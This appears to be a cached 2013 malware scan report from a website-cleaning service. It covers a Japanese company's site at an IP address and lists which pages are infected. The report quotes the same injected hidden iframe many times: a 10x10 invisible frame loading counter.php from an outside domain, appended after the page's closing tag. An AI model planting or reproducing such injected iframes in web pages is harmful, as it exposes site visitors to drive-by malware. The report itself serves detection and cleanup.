210.136.139.218 has 7 malicious iframes

New scan:

210.136.139.218

(cached results from Sun Aug 18 20:34:05 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
7/3/10
10 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious redirects
OK
Malicious/Hidden/Total iFrames
7/0/7
7 malicious iframes found. See details below
Deface / Content modification
OK

Setup daily monitoring of 210.136.139.218

Paste the following HTML code anywhere into "210.136.139.218" website.

eVuln.com

Scanned pages/files

RequestServer responseStatus
http://210.136.139.218/
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/index.html
200 OK
Content-Length: 2199
Content-Type: text/html
suspicious
Page code contains blacklisted domain: jisyubo.co.jp

...[1347 bytes skipped]...
t;
<li id="menu06"><a href="../06inquire/index.cgi">お問い合わせ</a></li>
</ul>
<br class="cl" />
</div>
<div id="main">
<h2><img src="img/h2.jpg" width="830" height="43" alt="企業概要" /></h2>
<h3>自主防 福岡オフィス</h3>
<p>〒814-0004 福岡市早良区曙1-6-16<br />
電話/ファックス 092-851-8855<br />
E-mail <a href="mailto:fukuoka@jisyubo.co.jp">fukuoka@jisyubo.co.jp</a></p>
<h3>自主防 久留米工場</h3>
<p>〒839-0821 福岡県久留米市太郎原町1539<br />
電話 0942-43-3344 ファックス 0942-43-2255<br />
E-mail <a href="mailto:info@jisyubo.co.jp">info@jisyubo.co.jp</a></p>
</div>
<div id="foot-navi">|&nbsp;<a href="../index.html">HOME</a>&nbsp;|&nbsp;<a href="../01outline/index.html">会社概要</a>&nbsp;|&nbsp;<a href="#
...[605 bytes skipped]...

http://210.136.139.218/01outline/../index.html
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/../
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/../01outline/index.html
200 OK
Content-Length: 2199
Content-Type: text/html
suspicious
Page code contains blacklisted domain: jisyubo.co.jp

...[1347 bytes skipped]...
t;
<li id="menu06"><a href="../06inquire/index.cgi">お問い合わせ</a></li>
</ul>
<br class="cl" />
</div>
<div id="main">
<h2><img src="img/h2.jpg" width="830" height="43" alt="企業概要" /></h2>
<h3>自主防 福岡オフィス</h3>
<p>〒814-0004 福岡市早良区曙1-6-16<br />
電話/ファックス 092-851-8855<br />
E-mail <a href="mailto:fukuoka@jisyubo.co.jp">fukuoka@jisyubo.co.jp</a></p>
<h3>自主防 久留米工場</h3>
<p>〒839-0821 福岡県久留米市太郎原町1539<br />
電話 0942-43-3344 ファックス 0942-43-2255<br />
E-mail <a href="mailto:info@jisyubo.co.jp">info@jisyubo.co.jp</a></p>
</div>
<div id="foot-navi">|&nbsp;<a href="../index.html">HOME</a>&nbsp;|&nbsp;<a href="../01outline/index.html">会社概要</a>&nbsp;|&nbsp;<a href="#
...[605 bytes skipped]...

http://210.136.139.218/01outline/../01outline/../index.html
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/../01outline/../
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/../01outline/../01outline/index.html
200 OK
Content-Length: 2199
Content-Type: text/html
suspicious
Page code contains blacklisted domain: jisyubo.co.jp

...[1347 bytes skipped]...
t;
<li id="menu06"><a href="../06inquire/index.cgi">お問い合わせ</a></li>
</ul>
<br class="cl" />
</div>
<div id="main">
<h2><img src="img/h2.jpg" width="830" height="43" alt="企業概要" /></h2>
<h3>自主防 福岡オフィス</h3>
<p>〒814-0004 福岡市早良区曙1-6-16<br />
電話/ファックス 092-851-8855<br />
E-mail <a href="mailto:fukuoka@jisyubo.co.jp">fukuoka@jisyubo.co.jp</a></p>
<h3>自主防 久留米工場</h3>
<p>〒839-0821 福岡県久留米市太郎原町1539<br />
電話 0942-43-3344 ファックス 0942-43-2255<br />
E-mail <a href="mailto:info@jisyubo.co.jp">info@jisyubo.co.jp</a></p>
</div>
<div id="foot-navi">|&nbsp;<a href="../index.html">HOME</a>&nbsp;|&nbsp;<a href="../01outline/index.html">会社概要</a>&nbsp;|&nbsp;<a href="#
...[605 bytes skipped]...

http://210.136.139.218/01outline/../01outline/../01outline/../index.html
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://210.136.139.218/01outline/../01outline/../01outline/../
200 OK
Content-Length: 3064
Content-Type: text/html
malicious
Page code contains blacklisted domain: charlogplastics.co.za

...[3513 bytes skipped]...
i紹介</a>&nbsp;|&nbsp;<a href="05downroad/index.html">カタログダウンロード</a>&nbsp;|&nbsp;<a href="06inquire/index.cgi">お問い合わせ</a>&nbsp;|</div>
<div id="footer"><!-- #BeginLibraryItem "/Library/copy.lbi" -->
<p>copyright&copy;2009 自主防 All Rights Reserved.</p>
<!-- #EndLibraryItem --></div>
</div>
</body>
</html><iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Malicious iFrame found.
size: 10x10     style: hidden
src: http://charlogplastics.co.za/counter.php
This URL is marked by Google as suspicious

<iframe src="http://charlogplastics.co.za/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>


Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: 210.136.139.218

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Aug 2013 17:34:06 GMT
Accept-Ranges: bytes
ETag: "2b8403-bf8-5184f7d9"
Server: Apache
Content-Length: 3064
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 11:58:17 GMT

...3064 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 210.136.139.218
Referer: http://www.google.com/search?q=210.136.139.218

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=210.136.139.218

Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://210.136.139.218/

Result: 210.136.139.218 is not infected or malware details are not published yet.
Infected sites found